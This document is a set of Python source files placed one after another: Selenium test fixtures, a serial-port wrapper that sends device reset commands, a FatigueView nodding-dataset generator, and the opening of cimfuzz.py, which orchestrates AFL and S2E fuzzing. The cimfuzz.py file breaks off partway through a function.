            # Assume that visiting the logout URL then waiting for a timeout will ensure the logout worked, even if the message can't be found.
            pass
        self.user = None
    def get_book_url(self, url):
        """Fetch *url* relative to the published test book."""
        return self.get(f"books/published/test_course_1/{url}")
# Present ``_SeleniumServerUtils`` as a fixture.
@pytest.fixture
def selenium_utils(
    selenium_driver, web2py_server_address, runestone_name  # noqa: F811
):
    """Provide ``_SeleniumServerUtils`` bound to the running test server."""
    return _SeleniumServerUtils(
        selenium_driver, f"{web2py_server_address}/{runestone_name}"
    )
# A fixture to login to the test_user_1 account using Selenium before testing, then logout when the tests complete.
@pytest.fixture
def selenium_utils_user(selenium_utils, test_user_1):
    """Log ``test_user_1`` in via Selenium; log out when the test finishes."""
    selenium_utils.login(test_user_1)
    yield selenium_utils
    selenium_utils.logout()
|
serialport.py | # coding= utf-8
import serial
from threading import Thread
import serial.tools.list_ports
import time
class SerialPort:
    """Wraps a pyserial connection: a background read thread, optional logging
    to a file-like writer, and an auto-test state machine that issues warm and
    cold resets based on the device's log output.
    """

    def __init__(self, iport, fileWriter=None, baudRate=115200, showLog=False):
        self.zeroCount = 0
        self._port = iport            # device name, e.g. 'COM3' or '/dev/ttyUSB0'
        self._baudRate = baudRate
        self._showLog = showLog
        self._read_thread = None      # daemon Thread created by start()
        self._entity = None           # underlying serial.Serial instance
        self._file = fileWriter       # optional log sink with write()/close()
        self.callback = None          # invoked with the port name by reset()
        self.supportListener = None   # notified once FMI support is detected
        self.checkedSupportFmi = True # True until the first FMI probe succeeds
        self.isRunning = True
        self.cycleTime = time.time()  # start of the current test cycle
        self.state = 0                # last observed 'E,<n>' state code
        # Warm resets remaining before forcing a cold reset.
        # (Attribute name typo "Rset" kept for backward compatibility.)
        self.coldRsetLimit = 100
        self.warmResetInterval = 0
        self.logTime = None           # when set, read_data() echoes and auto-tests

    def setCallback(self, callback):
        """Register the callable used by reset(); it receives the port name."""
        self.callback = callback

    def logStateTime(self, logTime, warmResetInterval=0):
        """Enable state/time logging and optional warm-reset pacing."""
        self.logTime = logTime
        self.warmResetInterval = warmResetInterval

    def setSupportFmi(self, supportListener):
        """Register the listener notified once FMI support is detected."""
        self.supportListener = supportListener

    def getSupportFmi(self):
        return self.checkedSupportFmi

    def getPort(self):
        return self._port

    def setFile(self, fileWriter, timeStr):
        """Attach a log writer and stamp it with the session start time."""
        self._file = fileWriter
        self._file.write('StartTime =' + timeStr + '\r\n')

    def writeSerialData(self, value):
        """Append *value* to the log file, if one is attached."""
        if self._file is not None:
            self._file.write(value)

    def is_running(self):
        # BUG FIX: use the pyserial 3.x ``is_open`` property (as send_data
        # already does; ``isOpen()`` is deprecated/removed) and logical ``and``
        # instead of bitwise ``&`` on booleans.
        return self._entity.is_open and self.isRunning

    def open_serial(self):
        """Open the serial device; raises IOError on failure."""
        try:
            self._entity = serial.Serial(self._port, self._baudRate, timeout=3)
        except Exception as exc:
            # Chain the original cause for easier debugging.
            raise IOError(f'can not open serial{self._port}:{self._baudRate}') from exc

    def close_serial(self):
        """Stop the read loop and release the port and log file."""
        self.isRunning = False
        if self._entity is not None:
            self._entity.close()
        if self._file:
            self._file.close()

    def send_data(self, data):
        """Write *data* (str or bytes) to the port; best-effort, errors ignored."""
        if self._entity.is_open:
            if isinstance(data, str):
                data = data.encode()
            try:
                self._entity.write(data)
                self._entity.flush()
            except Exception:
                return
            print("send data", data)

    def read_data(self):
        """Read one line from the device, update FMI state, log and auto-test."""
        try:
            data = self._entity.readline()
        except Exception as e:
            print('read_data', e)
            self.isRunning = False
            return
        if self.checkedSupportFmi:
            # Any line ending or a $VERSION banner means the device talks to us.
            if (b"\r\n" in data) or (b'$VERSION' in data):
                self.checkedSupportFmi = False
                if self.supportListener is not None:
                    self.supportListener(self._port)
        if len(data) <= 0:
            return None
        if self.logTime:
            print(data)
            self.autoTest(data)
        if self._file:
            self._file.write(data)

    def notify(self, data):
        """Forward *data* to the device if the port is open and running."""
        try:
            # BUG FIX: logical ``and`` instead of bitwise ``&``.
            if self._entity.is_open and self.isRunning:
                self._entity.write(data)
        except Exception as e:
            print(e)

    def read_thread(self):
        """Blocking read loop; runs on the daemon thread started by start()."""
        while self._entity.is_open and self.isRunning:
            self.read_data()

    def start(self):
        """Open the port if needed and launch the reader thread."""
        if self._entity is None:
            self.open_serial()
        # The original guarded "reset to None" was a no-op; a fresh reader
        # thread is created on every start() call, matching prior behavior.
        self._read_thread = Thread(target=self.read_thread, daemon=True)
        self._read_thread.start()

    def autoTest(self, data):
        """State machine driven by device log lines; issues warm/cold resets."""
        strData = str(data)
        # No progress for 5 minutes -> warm reset.
        if time.time() - self.cycleTime > 300:
            self.warmStart()
        if 'E,1' in strData and self.state != 1:
            self.state = 1
            self.writeLog(1)
        elif 'E,5' in strData and self.state != 5:
            self.state = 5
            self.writeLog(5)
        elif 'E,4' in strData and self.state != 4 and self.state != 0:
            self.state = 4
            self.writeLog(4)
            self.warmStart()
        elif 'cors up' in strData:
            self._file.write('TIME,cors_up,%d,%d\r\n' % (self.cycleTime, time.time() - self.cycleTime))
        elif 'E,4' in strData and self.state == 0:
            # E,4 right at cycle start: only reset once 3 seconds have passed.
            if time.time() - self.cycleTime > 3:
                self.warmStart()
        elif 'open error path' in strData:
            self.coldReset()

    def reset(self):
        """Delegate a reset request to the registered callback."""
        self.callback(self._port)

    def warmStart(self):
        """Issue a warm reset; after 100 warm resets, force a cold reset."""
        self.coldRsetLimit -= 1
        # cold reset after warm reset 100 times
        if self.coldRsetLimit <= 0:
            self.coldReset()
            self.coldRsetLimit = 100
            return
        self.send_data('AT+WARM_RESET\r\n')
        self.cycleTime = time.time()
        self.state = 0
        self._file.write("TIME,warm reset:%d,%s\r\n" % (
            self.cycleTime, time.strftime('%d %H%M%S', time.localtime(time.time())),))

    def coldReset(self):
        """Issue a cold reset and log it."""
        self.state = 0
        self.send_data('AT+COLD_RESET\r\n')
        self._file.write("TIME,cold reset:%d,%s\r\n" % (
            time.time(), time.strftime('%d %H%M%S', time.localtime(time.time()))))

    def writeLog(self, state):
        """Log a state transition with the elapsed time in the current cycle."""
        self._file.write("TIME,status:%d,%d,%d\r\n" % (state, self.cycleTime, time.time() - self.cycleTime))
|
generate_dataset_from_FatigueView.py | # -*- coding: UTF-8 -*-
'''=================================================
@Author :zhenyu.yang
@Date :2020/11/5 11:37 AM
=================================================='''
import sys
sys.path.append('./')
sys.path.insert(0,'/data/zhenyu.yang/modules')
import cv2
import json
import numpy as np
import random
import copy
from multiprocessing import Process
import os
def getFiles(path, suffix, prefix):
    """Recursively collect files under *path* whose basenames start with
    *prefix* and end with *suffix*."""
    matches = []
    for root, dirs, files in os.walk(path):
        for name in files:
            if name.endswith(suffix) and name.startswith(prefix):
                matches.append(os.path.join(root, name))
    return matches
def get_ear(ldmk):
    """Eye aspect ratio: vertical over horizontal eye extent, capped at 0.7.

    *ldmk* is an 8-point eye contour; points 0/4 span the width, 2/6 the height.
    """
    eps = 1e-5  # keeps the ratio finite for degenerate (collapsed) contours

    def dist(p, q):
        return ((p[0] - q[0]) ** 2 + (p[1] - q[1]) ** 2 + eps) ** 0.5

    width = dist(ldmk[0], ldmk[4])
    height = dist(ldmk[2], ldmk[6])
    return min(height / width, 0.7)
def get_ear_height(ldmk):
    """Mean absolute vertical distance across the three eyelid landmark pairs."""
    pairs = ((2, 6), (1, 7), (3, 5))
    heights = [ldmk[a][1] - ldmk[b][1] for a, b in pairs]
    return np.mean(np.abs(heights))
def get_fea_label(img_info):
    """Return the [x, y] centre of the eye landmarks of one frame record.

    Args:
        img_info: per-frame dict; 'ldmk' holds the facial landmark array.

    Returns:
        [x, y] mean of the eye landmarks, or [-1, -1] when landmarks are
        missing or too short.
    """
    eye_center = [-1, -1]
    if 'ldmk' in img_info and img_info['ldmk'] is not None and len(img_info['ldmk']) > 4:
        ldmk = np.array(img_info['ldmk'])
        # BUG FIX: the 68-point scheme puts the eyes at indices 36..47
        # inclusive; the original slice 36:47 dropped point 47 (off-by-one).
        eye_ldmk = ldmk[36:48]
        x, y = np.mean(eye_ldmk, axis=0)
        eye_center = [x, y]
    return eye_center
def get_perclose(height_list):
    """Counts of frames whose eyelid closure exceeds 50/70/90 percent.

    Closure is measured per frame as 1 - height/max(height_list).
    """
    peak = max(height_list)
    closures = [1 - h / peak for h in height_list]
    return [sum(c > t for c in closures) for t in (0.5, 0.7, 0.9)]
def get_eye_movement(height_list):
    """Fraction of frames showing a >1-pixel inter-frame eyelid height jump."""
    jumps = [abs(b - a) for a, b in zip(height_list, height_list[1:])]
    return sum(j > 1 for j in jumps) / len(height_list)
def list2num(slice_list):
    """Expand [start, end] (end inclusive) pairs into a flat list of numbers."""
    nums = []
    for span in slice_list:
        nums.extend(range(span[0], span[1] + 1))
    return nums
def is_stretch(stretch_list,left_index,right_index):
    """Classify the window [left_index, right_index] against the labelled
    stretch intervals.

    Returns:
        1  -- the window contains, or is contained in, some stretch
        0  -- the window barely overlaps any stretch (clean negative sample)
        -1 -- ambiguous partial overlap; caller should discard the window
    """
    # 1 : stretch 0: normal -1 : ignore
    max_union = -1
    frame_len = right_index - left_index
    for stretch in stretch_list:
        stretch_len = abs(stretch[1] - stretch[0])
        # Intersection of the query window with this stretch.
        temp_left = max(left_index,stretch[0])
        temp_right = min(right_index,stretch[1])
        # If the intersection equals either interval, one contains the other.
        if [temp_left,temp_right] in [stretch,[left_index,right_index]]:
            return 1
        # Overlap ratio relative to the shorter of the two intervals
        # (+0.1 guards against division by zero on zero-length intervals).
        union = (temp_right - temp_left) /( min(stretch_len,frame_len) + 0.1)
        max_union = max(max_union,union)
    if max_union < 0.1:
        return 0
    return -1
def min_is_nodding(x_list, threshold):
    """Return 1 if the centre sample of *x_list* is a nod, else 0.

    A nod requires the centre value to be a valid (!= -1) extreme of the
    window whose valid range exceeds *threshold*.
    """
    # No valid (!= -1) samples at all -> not a nod.
    if sum(v != -1 for v in x_list) == 0:
        return 0
    # Centre sample itself is invalid -> not a nod.
    if x_list[len(x_list) // 2] == -1:
        return 0
    _x = x_list[len(x_list) // 2]
    x_list = [v for v in x_list if v != -1]
    if max(x_list) - min(x_list) > threshold and _x in [max(x_list), min(x_list)]:
        return 1
    # BUG FIX: the original fell off the end and returned None, which made
    # sum(ans) in is_nodding() raise TypeError; return 0 explicitly.
    return 0
def is_nodding(x_list, half_frame_len=8, threshold=4):
    """Count the sliding windows of *x_list* whose centre sample is a nod."""
    hits = [
        min_is_nodding(x_list[i - half_frame_len:i + half_frame_len], threshold)
        for i in range(half_frame_len, len(x_list) - half_frame_len)
    ]
    return sum(hits)
def get_batch_data(video_list,suffix,dst_dir,time_len = 10):
    """Worker: harvest positive (nodding) and negative eye-centre sequences
    from each video's annotation files and dump them as small JSON files.

    Args:
        video_list: videos assigned to this worker (consumed destructively)
        suffix: versioned annotation-file suffix, e.g. '_v0.1.json'
        dst_dir: output directory for per-sample JSON files
        time_len: nominal clip length in seconds (25 fps assumed)
    """
    random.shuffle(video_list)
    half_frame_len = time_len*25//2
    # NOTE(review): the computed value above is immediately overridden
    # with a fixed window of 40 frames -- confirm which is intended.
    half_frame_len = 40
    while True:
        if len(video_list) == 0:
            break
        video_path = video_list.pop()
        # Normalise the container extension so path substitutions work.
        video_suffix = '.mp4'
        if video_path.endswith('.mp4'):
            video_suffix = '.mp4'
        elif video_path.endswith('.avi'):
            video_suffix = '.avi'
        json_path = video_path.replace(video_suffix, suffix)
        if not os.path.exists(json_path):
            continue
        # nodding.json holds the labelled [start, end] nod intervals.
        stretch_path = video_path.replace(os.path.basename(video_path), 'nodding.json')
        if not os.path.exists(stretch_path):
            continue
        with open(json_path, 'r') as f:
            big_json = f.readlines()
        skeleton_list = []
        # One JSON record per frame; unparseable lines are skipped.
        for json_info in big_json:
            try:
                json_info = json.loads(json_info.strip())
            except:
                continue
            skeleton_list.append(get_fea_label(json_info))
        with open(stretch_path, 'r') as f:
            stretch_list = json.load(f)
        # Positive samples: one clip (label 1) per labelled nod interval.
        for stretch in stretch_list:
            stretch = list(map(int,stretch))
            temp_eye_list = skeleton_list[stretch[0]:stretch[1]]
            temp_eye_list.append(1)  # trailing element is the class label
            frame_id = sum(stretch)//2
            npy_name = '_'.join(video_path.split(os.sep)[-4:]).replace(video_suffix,'')
            npy_name = '{}__{}__{}.json'.format(1, npy_name, frame_id)
            with open(os.path.join(dst_dir, npy_name), 'w') as f:
                json.dump(temp_eye_list, f)
        # Negative samples: random windows that do not overlap any nod.
        temp_count = 0
        for i in range(10000*len(stretch_list)):
            frame_id = int(random.random()*len(skeleton_list))
            # NOTE(review): this bounds check tests the loop counter `i`
            # rather than `frame_id` -- looks like a bug; confirm intent.
            if i < half_frame_len or i >= len(skeleton_list) - (half_frame_len+1):
                continue
            temp_stretch = is_stretch(stretch_list,frame_id-half_frame_len,frame_id+half_frame_len)
            if temp_stretch != 0:
                continue
            temp_count += 1
            temp_eye_list = skeleton_list[frame_id-half_frame_len:frame_id+half_frame_len]
            temp_eye_list.append(0)  # label 0 = normal
            npy_name = '_'.join(video_path.split(os.sep)[-4:]).replace(video_suffix,'')
            npy_name = '{}__{}__{}.json'.format(0, npy_name, frame_id)
            with open(os.path.join(dst_dir, npy_name), 'w') as f:
                json.dump(temp_eye_list, f)
            # Keep the negative count comparable to the positive count.
            if temp_count > len(stretch_list):
                break
def split(input, num=60):
    """Shuffle *input* in place and partition it into *num* chunks.

    The final chunk absorbs any remainder, so no element is dropped.
    """
    random.shuffle(input)
    chunk = len(input) // num
    parts = [input[i * chunk:(i + 1) * chunk] for i in range(num - 1)]
    parts.append(input[(num - 1) * chunk:])
    return parts
if __name__ == '__main__':
    # Annotation-file suffix is versioned alongside the labelling pipeline.
    version = 'v0.1'
    suffix = '_{}.json'.format(version)
    # NOTE(review): the first two src_dir_dict/camera_list assignments below
    # are dead -- both are overwritten before use; kept for reference.
    src_dir_dict = {'train':'/data/weiyu.li/DMSData/FatigueView/raw_video',
                    'test':'/data/weiyu.li/DMSData/FatigueView/test_video'
                    }
    src_dir_dict = {'test':'/data/weiyu.li/DMSData/FatigueView/test_video'
                    }
    camera_list = ['ir_down','ir_front','ir_left','ir_left_up','ir_up','rgb_down','rgb_front','rgb_left','rgb_left_up','rgb_up']
    # camera_list = ['rgb_left','rgb_left_up','rgb_up']
    src_dir_dict = {'beelab_test':'/data/weiyu.li/DMSData/FatigueView/beelab_test_video',
                    'beelab_train': '/data/weiyu.li/DMSData/FatigueView/beelab_train_video'
                    }
    camera_list = ['ir_down','ir_front','ir_left','ir_left_up','ir_up','rgb_down','rgb_front','rgb_left','rgb_left_up','rgb_up']
    data_type = 'train'
    camera_id = 0
    # One pass per (dataset split, camera view) pair.
    for data_type in src_dir_dict.keys():
        for camera_id in range(len(camera_list)):
            src_dir = src_dir_dict[data_type]
            camera_type = camera_list[camera_id]
            dst_dir = './data/{}/{}'.format(data_type,camera_type)
            if not os.path.exists(dst_dir):
                os.makedirs(dst_dir)
            # Videos for this camera view, either container format.
            video_list = getFiles(src_dir, '.mp4', camera_type)
            video_list += getFiles(src_dir, '.avi', camera_type)
            # (Historical per-subject exclusions kept for reference.)
            # if data_type == 'test':
            #     video_list = [v for v in video_list if 'fengchunshen' not in v and 'panbijia' not in v]
            #
            # if data_type == 'train':
            #     video_list = [v for v in video_list if 'zhaoxinmei' not in v]
            all_num = 60000
            running_num = 32
            # Never spawn more workers than there are videos.
            running_num = min(running_num,len(video_list))
            batch_size = all_num//running_num  # NOTE(review): unused
            split_videos = split(video_list, running_num)
            # Fan the work out over one process per video shard.
            process_list = []
            for i in range(running_num):
                temp_p = Process(target=get_batch_data,args=(split_videos[i],suffix,dst_dir,))
                process_list.append(temp_p)
            for temp_p in process_list:
                temp_p.start()
            for temp_p in process_list:
                temp_p.join()
    print('END')
|
cimfuzz.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
''' runtest
Assumptions:
The VMs of s2e be placed at S2EDIR/vm/ directory, with
name i386 and x86_64, the structure should look like:
========================================
$ tree $S2EDIR/vm
/$S2EDIR/vm
├── i386
│ ├── disk.s2e
│ └── disk.s2e.saved
└── x86_64
├── disk.s2e
└── disk.s2e.saved
========================================
tar.gz file structure (take dwarfdump as example):
========================================
$ tree ./test-dwarfdump/
./test_dwarfdump/
├── binary
│ └── cb
├── cmd
│ └── command.txt
├── input
│ ├── dummy.elf
│ └── HELLO.txt
└── library
├── libdwarf.so
├── libdwarf.so.1
├── libelf-0.158.so
├── libelf.so
└── libelf.so.1
$ tar -zcf cb.tar.gz ./test-dwarfdump
========================================
Binary be renamed to 'cb'
The command.txt file should contain the full command used
to execute the binary, without path infomation:
========================================
$ cat ./test-dwarfdump/cmd/command.txt
cb -ka -a @@
========================================
'''
import os
import sys
import json
import time
import pprint
import argparse
import traceback
from time import sleep
from datetime import datetime
from multiprocessing import Process, active_children, Queue
# import utilities
import docker
from utils import print_sep, url_get_file, kill_process
from utils import run_command_ret, run_command_noret, check_dir
from utils import pip_check, get_file_arch, md5sum, unzip
# Root of the checkout; all tool locations are derived from it.
HOME = os.path.dirname(os.path.realpath(__file__))
# Prebuilt S2E guest VM images tarball (downloaded by check_req()).
IMAGE_URL = 'https://s3.amazonaws.com/cyberimmunitylab.com/pkgs/vms.tar.gz'
AFLDIR = '{}/afl'.format(HOME)
S2EDIR = '{}/s2e'.format(HOME)
WATCHERDIR = '{}/coverage'.format(HOME)
# Effective user id; used as the default --docker_uid.
EUID = os.geteuid()
# Sub-directory names of the per-run experiment tree (see prepare_dir()).
BINARY = 'binary'
FILE = 'file'
INPUT = 'input'
LIBRARY = 'library'
EXPDATA = 'expdata'
CMD = 'cmd'
CFG = 'cfg'
OUTPUT_AFL = 'output_afl'
OUTPUT_S2E = 'output_s2e'
INPUT_S2E = 'input_s2e'
def run_afl(d_s, argv, queue=None):
    ''' start afl with its own launcher script

    d_s   -- directory-structure dict built by prepare_dir()
    argv  -- parsed command-line options (as a dict)
    queue -- optional multiprocessing.Queue; when given, the launched
             container name is also published on it for the parent process
    '''
    setproctitle.setproctitle('cimfuzz FUZZ launcher')
    # Imported late: modules are only guaranteed installed after check_req().
    import afl_launcher
    launcher_args = dict()
    launcher_args['qemu'] = True  # qemu mode
    launcher_args['fuzz_lib'] = argv['fuzz_lib']  # fuzz library
    launcher_args['debug'] = argv['debug']  # debug
    launcher_args['timeout'] = argv['timeout_afl']  # timeout of afl
    launcher_args['fid'] = argv['fid']  # file id: first 8 bytes of md5
    launcher_args['uid'] = argv['docker_uid']  # real user id of the container
    launcher_args['docker_img']= argv['docker_afl']  # container name
    launcher_args['arch'] = argv['arch']  # binary architecture
    launcher_args['parallel'] = argv['num_afl']  # number of afl processes to run
    launcher_args['resume'] = argv['resume']
    launcher_args['mode'] = argv['mode_afl']
    launcher_args['basedir'] = d_s['.']
    launcher_args['cmd_file'] = '{}/command.json'.format(d_s['.'])
    # Default the number of master instances to the total afl count.
    launcher_args['masters'] = argv.get('num_master') if argv.get('num_master') is not None else argv.get('num_afl')
    launcher_args['container_name']= argv['docker_afl']
    print_sep()
    print '[C]: args used for launching AFL:'
    print ''
    pprint.pprint(launcher_args)
    print ''
    sys.stdout.flush()
    # import afl_no_docker
    # launcher = afl_no_docker.AFLLauncher(launcher_args)
    # container = launcher.launch()
    # return container
    # call afl launcher
    launcher = afl_launcher.AFLLauncher(launcher_args)
    container = launcher.launch()
    if queue:
        queue.put(container)
    return container
def run_watcher(d_s, argv):
    '''execute the directory watcher for each of the AFL instance

    Builds the database configuration and the paths the watcher monitors
    (AFL output, S2E output, and the seedbox queue), then blocks inside
    watcher.launch(). Intended to run in its own process.
    '''
    setproctitle.setproctitle('cimfuzz file watcher')
    import watcher
    launcher_args = dict()
    db_config = dict()
    # Postgres connection parameters.
    db_config['database'] = argv['database']
    db_config['user'] = argv['user']
    db_config['password'] = argv['password']
    db_config['host'] = argv['host']
    db_config['port'] = argv['port']
    launcher_args['db_config'] = db_config
    # qemu binary used for dynamic basic-block coverage, per architecture.
    launcher_args['qemu'] = '{}/qemu-{}'.format(argv['qemu'], argv['arch'])
    launcher_args['project_id'] = argv['project_id']
    launcher_args['max_testcase_size'] = argv['max_testcase_size']
    launcher_args['basedir'] = d_s['.']
    # watcher related
    launcher_args['out_afl'] = '{}/{}'.format(d_s['out_afl'], argv['fid'])
    launcher_args['out_s2e'] = d_s['out_s2e']
    launcher_args['seedbox'] = '{}/seedbox/queue'.format(launcher_args['out_afl'])
    print_sep()
    print '[C]: args used for launching watcher:'
    print ''
    pprint.pprint(launcher_args)
    print ''
    watcher.launch(launcher_args)
def run_s2e(d_s, argv):
    ''' start s2e with its own launcher script

    Blocks inside S2ELauncher.start(); intended to run in its own process.
    '''
    setproctitle.setproctitle('cimfuzz SYM launcher')
    import s2e_launcher
    launcher_args = dict()
    launcher_args['basedir'] = d_s['.']  # /path/to/the/binary/
    launcher_args['process'] = argv['num_s2e']  # number of s2e processes to run
    launcher_args['timeout'] = argv['timeout_s2e']  # timeout time for a single s2e instance
    launcher_args['debug'] = argv['debug']  # debug
    launcher_args['project_id'] = argv['project_id']  # container name
    launcher_args['arch'] = argv['arch']  # binary architecture
    launcher_args['interval'] = argv['s2e_check_interval']
    launcher_args['threshold'] = argv['s2e_launch_threshold']
    launcher_args['mem_limit'] = argv['s2e_mem_limit']
    db_config = dict()
    # Postgres connection parameters.
    db_config['database'] = argv['database']
    db_config['user'] = argv['user']
    db_config['password'] = argv['password']
    db_config['host'] = argv['host']
    db_config['port'] = argv['port']
    launcher_args['db_config'] = db_config
    print_sep()
    print '[C]: args used for launching S2E:'
    print ''
    pprint.pprint(launcher_args)
    print ''
    print_sep()
    launcher = s2e_launcher.S2ELauncher(launcher_args)
    launcher.start()
def prepare_dir(dir_name):
    ''' prepare the test directory

    Creates (via check_dir) and returns a dict mapping logical names to the
    experiment sub-directories rooted at *dir_name*. Every value ends with
    a trailing slash.
    '''
    d_s = dict()
    d_s['.'] = '{}/'.format(dir_name)
    d_s['input'] = '{}/{}/'.format(dir_name, INPUT)
    d_s['binary'] = '{}/{}/'.format(dir_name, BINARY)
    d_s['file'] = '{}/{}/'.format(dir_name, FILE)
    d_s['cmd'] = '{}/{}/'.format(dir_name, CMD)
    d_s['cfg'] = '{}/{}/'.format(dir_name, CFG)
    # NOTE(review): 'in_afl' and 'out_afl' both point at OUTPUT_AFL -- looks
    # intentional (AFL reads seeds from its own output tree) but confirm.
    d_s['in_afl'] = '{}/{}/'.format(dir_name, OUTPUT_AFL)
    d_s['out_afl'] = '{}/{}/'.format(dir_name, OUTPUT_AFL)
    d_s['in_s2e'] = '{}/{}/'.format(dir_name, INPUT_S2E)  # S2E seed files fetched from database
    d_s['out_s2e'] = '{}/{}/'.format(dir_name, OUTPUT_S2E)
    d_s['library'] = '{}/{}/'.format(dir_name, LIBRARY)
    d_s['expdata'] = '{}/{}/'.format(d_s['out_s2e'], EXPDATA)
    # Python 2 idiom; ensure every directory in the map exists on disk.
    for key in d_s.iterkeys():
        check_dir(d_s[key])
    return d_s
def check_s2e_vm():
    ''' check whether s2e vm images exists

    Returns True when one or more guest images are missing and the user
    has agreed to download them; exits the program if the user declines.
    '''
    vm_file_list = [
        '{}/vm/i386/disk.s2e'.format(S2EDIR),
        '{}/vm/i386/disk.s2e.saved'.format(S2EDIR),
        '{}/vm/x86_64/disk.s2e'.format(S2EDIR),
        '{}/vm/x86_64/disk.s2e.saved'.format(S2EDIR)
    ]
    need_get = False
    for vm_file in vm_file_list:
        if not os.path.isfile(vm_file):
            need_get = True
    if need_get == False:
        print_sep()
        print '[C]: s2e guest VM images found!'
        return need_get
    # download vm file
    print_sep()
    print '[C]: ONE OR MORE S2E VM IMAGE NOT FOUND at dir [{}/vm]'.format(S2EDIR)
    # Loop until the user gives a recognisable yes/no answer; the sentinel
    # 'input' just forces at least one pass through the prompt.
    answer = 'input'
    while answer.lower() not in ['', 'y', 'n', 'yes', 'no']:
        answer = raw_input('Do you want the script to set it up? (Y/n): ')
    if not answer.lower() in ['', 'y', 'yes']:
        print '[C]: cimfunzz won\'t work without s2e image, Exiting now ...'
        exit(0)
    return need_get
def build_or_import(root_dir, image, import_img=True):
    ''' prepare docker image

    Loads the image from a local tarball when one exists (and import_img is
    True); otherwise builds it from the Dockerfile under *root_dir*.
    '''
    image_tar = '{}/DockerImage/{}.tar'.format(root_dir, image)
    if os.path.isfile(image_tar) and import_img:
        print '[C]: FOUND local copy of the image at {}'.format(image_tar)
        print '[C]: Importing docker image from file ...'
        command = 'docker load -i {}'.format(image_tar)
    else:
        if import_img:
            print '[C]: NO local copy of the image found at {}'.format(image_tar)
        print '[C]: Building a new one with Dockerfile at {}/Dockerfile ...'.format(root_dir)
        # NOTE(review): `docker build` expects a build-context directory;
        # passing {root}/Dockerfile as the context looks suspicious -- confirm.
        command = 'docker build -t {} {}/Dockerfile'.format(image, root_dir)
    run_command_noret(command)
    print_sep()
    print '[C]: Build finished ...'
def export_docker_image(image, c_type):
    ''' export docker image to tar file

    c_type selects the destination tree: 'afl' -> AFLDIR, 's2e' -> S2EDIR.
    The tarball lands in <root>/DockerImage/<image>.tar.
    '''
    root_dir = ''
    if c_type == 'afl':
        root_dir = AFLDIR
    elif c_type == 's2e':
        root_dir = S2EDIR
    command = 'docker save {0} -o {1}/DockerImage/{0}.tar'.format(image, root_dir)
    run_command_noret(command)
def check_docker_image_exist(image):
    ''' check whether the docker image already exists

    `docker images -q` prints the image id iff the image is present, so a
    non-empty result means the image exists locally.
    '''
    output, _ = run_command_ret('docker images -q {}'.format(image))
    return bool(output)
def check_docker_image(image, c_type):
    ''' check the docker image and prepare the setup

    Returns a (need_import, need_build, need_export) tuple of booleans,
    derived from what exists locally plus interactive user answers.
    All-False means the image is already available.
    '''
    # if docker image already exists
    if check_docker_image_exist(image):
        return (False, False, False)
    print_sep()
    print '[C]: [{}] docker image [{}] not found!'.format(c_type.upper(), image)
    if c_type == 'afl':
        root_dir = AFLDIR
    elif c_type == 's2e':
        root_dir = S2EDIR
    else:
        print '[C]: container type not known, Exiting now ...'
        exit(0)
    # check tar file
    need_import = False
    need_build = False
    need_export = False
    image_tar = '{}/DockerImage/{}.tar'.format(root_dir, image)
    file_exist = os.path.isfile(image_tar)
    if file_exist:
        print '[C]: FOUND local copy of the image at {}'.format(image_tar)
        # The 'input' sentinel forces at least one pass through the prompt.
        imp = 'input'
        while imp.lower() not in ['', 'y', 'n', 'yes', 'no']:
            imp = raw_input('Do you want the script to import it? (Y/n): ')
        if imp.lower() in ['', 'y', 'yes']:
            need_import = True
    # Fall back to building when there is no tarball or the user declined it.
    if need_import == False or not file_exist:
        build = 'input'
        while build.lower() not in ['', 'y', 'n', 'yes', 'no']:
            build = raw_input('Do you want the script to build the image? (Y/n): ')
        if build.lower() in ['', 'y', 'yes']:
            need_build = True
        export = 'input'
        while export.lower() not in ['', 'y', 'n', 'yes', 'no']:
            export = raw_input('Export the image to a tar file after build? (Y/n): ')
        if export.lower() in ['', 'y', 'yes']:
            need_export = True
    return (need_import, need_build, need_export)
def execute_aflonly(dir_struct, argv):
    ''' launch only the AFL container and block until interrupted '''
    try:
        container = run_afl(dir_struct, argv)
        # Park the parent process; all fuzzing happens in the container.
        while True:
            time.sleep(1)
    except (Exception, KeyboardInterrupt):
        print 'kill container'
        # NOTE(review): if run_afl() itself raised, `container` is unbound
        # here and this handler raises NameError -- confirm/fix upstream.
        docker.from_env().containers.get(container).kill()
        traceback.print_exc()
def execute(dir_struct, argv):
    ''' launch watcher and execute afl/s2e launcher script

    Launch order: static analysis first (to obtain the project id), then the
    watcher, then AFL (whose container name is handed back through a Queue),
    and finally S2E. Blocks until interrupted, then tears everything down.
    '''
    # static analyze
    from analyze import StaticAnalyzer, DB
    db_config = {}
    db_config['host'] = argv['host']
    db_config['port'] = argv['port']
    db_config['database'] = argv['database']
    db_config['user'] = argv['user']
    db_config['password'] = argv['password']
    # First (and only expected) file in the cfg directory is the CFG.
    cfg = os.path.join(dir_struct['cfg'] + os.listdir(dir_struct['cfg'])[0])
    analyzer = StaticAnalyzer(db_config=db_config, cfg=cfg, basedir=dir_struct['.'],
                              tar=argv['tar_file'], arch=argv['arch'])
    processes = []
    container = None
    try:
        print '>'*100
        # Register the project in the database and obtain its id.
        project_id = analyzer.analyze_static()
        argv['project_id'] = project_id
        print '#'*100
        print 'Project id: {}'.format(project_id)
        print '#'*100
        print '>'*100
        # lauch watcher
        process_watcher = Process(target=run_watcher, args=[dir_struct, argv])
        process_watcher.start()
        processes.append(process_watcher)
        sleep(0.5)
        print '>'*100
        # execute afl; the child publishes its container name on the queue
        queue = Queue()
        process_afl = Process(target=run_afl, args=[dir_struct, argv, queue])
        process_afl.daemon = True
        process_afl.start()
        container = queue.get(timeout=1)
        processes.append(process_afl)
        sleep(0.5)
        print '>'*100
        # make s2e launcher as the last compenent
        process_s2e = Process(target=run_s2e, args=[dir_struct, argv])
        process_s2e.start()
        processes.append(process_s2e)
        print '>'*100
        while True:
            time.sleep(1)
    except (Exception, KeyboardInterrupt):
        # Teardown: kill the AFL container (if it got started), then every
        # child process, and reap zombies via active_children().
        print 'kill container'
        if container:
            docker.from_env().containers.get(container).kill()
        print 'kill subprocess'
        for p in processes:
            kill_process(p)
        active_children()
        traceback.print_exc()
def check_req(argv):
    ''' check the requirements of cim_fuzz

    Verifies docker images, S2E VM images, python packages, and the qemu
    coverage builds, downloading/building whatever is missing. Also stores
    the coverage-qemu directory in argv['qemu'].
    '''
    # check afl docker image
    ret = check_docker_image(argv['docker_afl'], 'afl')
    (import_afl, build_afl, export_afl) = ret
    # (import_afl, build_afl, export_afl) = (False, False, False)
    # check s2e docker image
    # ret = check_docker_image(argv['docker_s2e'], 's2e')
